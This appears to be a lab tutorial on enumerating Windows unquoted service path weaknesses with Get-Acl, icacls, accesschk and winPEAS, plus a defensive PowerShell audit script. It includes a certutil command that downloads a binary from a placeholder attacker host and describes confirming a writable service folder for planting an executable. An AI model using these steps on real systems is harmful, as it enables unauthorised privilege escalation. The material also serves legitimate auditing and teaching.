ENUMERATING SERVICE WITH GET-ACL (POWERSHELL)

  1. Get-Acl is a built-in cmdlet in PowerShell and comes by default with Windows PowerShell. You do not need to install any additional modules to use it.
    https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4

    NOTE: the commands in the steps below enumerate the permissions on each folder along the unquoted service path.

  2. We can see that Get-Acl doesn't explicitly say "Modify" for C:\ the way icacls does. Instead, it reports rights as an access mask: numeric values that encode specific permissions, one of which corresponds to Modify.
    Get-Acl -Path C:\ | Format-List

  3. The numerical value -1610612736 represents Read and Execute permissions.
    Get-Acl -Path "C:\Program Files" | Format-List

  4. Here we find that BUILTIN\Users has FullControl on C:\Program Files\Unquoted Path Service.
    Get-Acl -Path "C:\Program Files\Unquoted Path Service" | Format-List
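The manual Get-Acl checks above can be turned into a single audit pass. The following PowerShell is an added example, not part of the original notes: it splits every unquoted service ImagePath into the directories the Service Control Manager would probe and uses Get-Acl to flag those whose access mask grants file-creation rights to broad principals. The principal list and the write mask are assumptions chosen here; the -1610612736 value is the same generic Read and Execute mask discussed above.

```powershell
# Added audit example (not part of the original notes): list every service whose
# ImagePath is unquoted and contains spaces, split it into the directories the
# Service Control Manager would probe, and flag those that let broad principals
# create files. Assumptions: the principal list and write mask below are ours.

$BroadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
# Access-mask bits that allow creating a file: CreateFiles (0x2) plus the generic
# rights that imply it. Generic bits sit in the top nibble, which is why Get-Acl
# prints them as large negative numbers (-1610612736 = GENERIC_READ | GENERIC_EXECUTE).
# CreateDirectories (0x4) on its own, as granted on C:\, is deliberately not enough.
$WriteMask = 0x2 -bor 0x40000000 -bor 0x10000000   # CreateFiles | GENERIC_WRITE | GENERIC_ALL

function Get-UnquotedPathCandidates {
    param([string]$ImagePath)
    if (-not $ImagePath) { return @() }
    # Keep text up to and including ".exe" so service arguments are dropped
    $exe = if ($ImagePath -match '^(.*?\.exe)') { $Matches[1] } else { $ImagePath }
    if ($exe.StartsWith('"') -or $exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    $dirs = for ($i = 1; $i -lt $parts.Count; $i++) {
        # Each space-terminated prefix is a path the SCM may try; its parent is the folder to audit
        Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
    }
    return @($dirs | Where-Object { $_ } | Sort-Object -Unique)
}

function Find-BroadWriteAce {
    param([string]$Directory)
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # value__ exposes the raw access mask behind the FileSystemRights enum
        if (($ace.FileSystemRights.value__ -band $WriteMask) -ne 0) { return $ace }
    }
    return $null
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    foreach ($dir in Get-UnquotedPathCandidates -ImagePath $svc.PathName) {
        $ace = Find-BroadWriteAce -Directory $dir
        if ($ace) {
            [pscustomobject]@{ Service = $svc.Name; Directory = $dir
                               Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}
$findings | Format-Table -AutoSize   # remediation: quote the ImagePath and remove the broad write ACE
```

Run as a standard user; an empty table means no unquoted service path on the host has a folder where Users, Authenticated Users or Everyone can create files.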

ENUMERATING SERVICE WITH ICACLS (CMD)

  1. To verify permissions with icacls, it's important to understand the permissions for each directory.
    Check Microsoft documentation to learn more about permissions.

  2. Administrators and SYSTEM have Full Control, and Authenticated Users can create folders but not files.
    icacls C:\

  3. TrustedInstaller has Full Control, SYSTEM and Administrators have Modify and Full Control, and Users have Read and Execute permissions.
    icacls "C:\Program Files"

  4. Users have Full Control; SYSTEM and Administrators have inherited Full Control.
    icacls "C:\Program Files\Unquoted Path Service"

  5. All users have Read & Execute permissions; SYSTEM and Administrators have inherited Full Control; CREATOR OWNER has inherited Full Control.
    icacls "C:\Program Files\Unquoted Path Service\Common Files"

  6. Our PoC shows that moving an EXE file to C:\, C:\Program Files, or C:\Program Files\Unquoted Path Service\Common Files is blocked, but it succeeds in C:\Program Files\Unquoted Path Service\.

ENUMERATING SERVICE PERMISSION WITH ACCESSCHK

  1. If you don't have the Sysinternals Suite on your machine, you can download it from the official Microsoft Website.

    NOTE: We have identified that the target machine is a 64-bit architecture using the following command:
    systeminfo | findstr /B /C:"System Type"

  2. Host the binary with a Python HTTP server and transfer it to the target machine with certutil.
    certutil -urlcache -f http://[IP-ADDRESS]:8000/accesschk64.exe accesschk64.exe

    NOTE: With accesschk now on the target system, we can use the following command to enumerate the folder permissions

  3. The output from AccessChk shows our permissions on C:\. It indicates that we have write (W) access, but it is restricted to creating folders only (FILE_ADD_SUBDIRECTORY).
    .\accesschk64.exe -wvud "C:\" -accepteula

  4. accesschk64.exe shows that NT AUTHORITY\SYSTEM and BUILTIN\Administrators have extensive permissions,
    while a standard user has no write permissions.
    .\accesschk64.exe -wvud "C:\Program Files" -accepteula

  5. Finally, all users, including standard users, have full write permissions in C:\Program Files\Unquoted Path Service.
    .\accesschk64.exe -wvud "C:\Program Files\Unquoted Path Service" -accepteula

ENUMERATING SERVICE WITH WINPEAS

  1. When we used winPEAS in the Hunting Section, we found an unquoted service path in the “Service Information” section.

  2. We can scroll down through the output to the "Application Information" section and then check under the "Installed Applications" sub-section. To determine whether this service can be exploited, we identify which folder in the unquoted service path has write permissions.

NOTE

If we do not find a writable folder in this section associated with the unquoted service path, we likely won’t be able to exploit this service.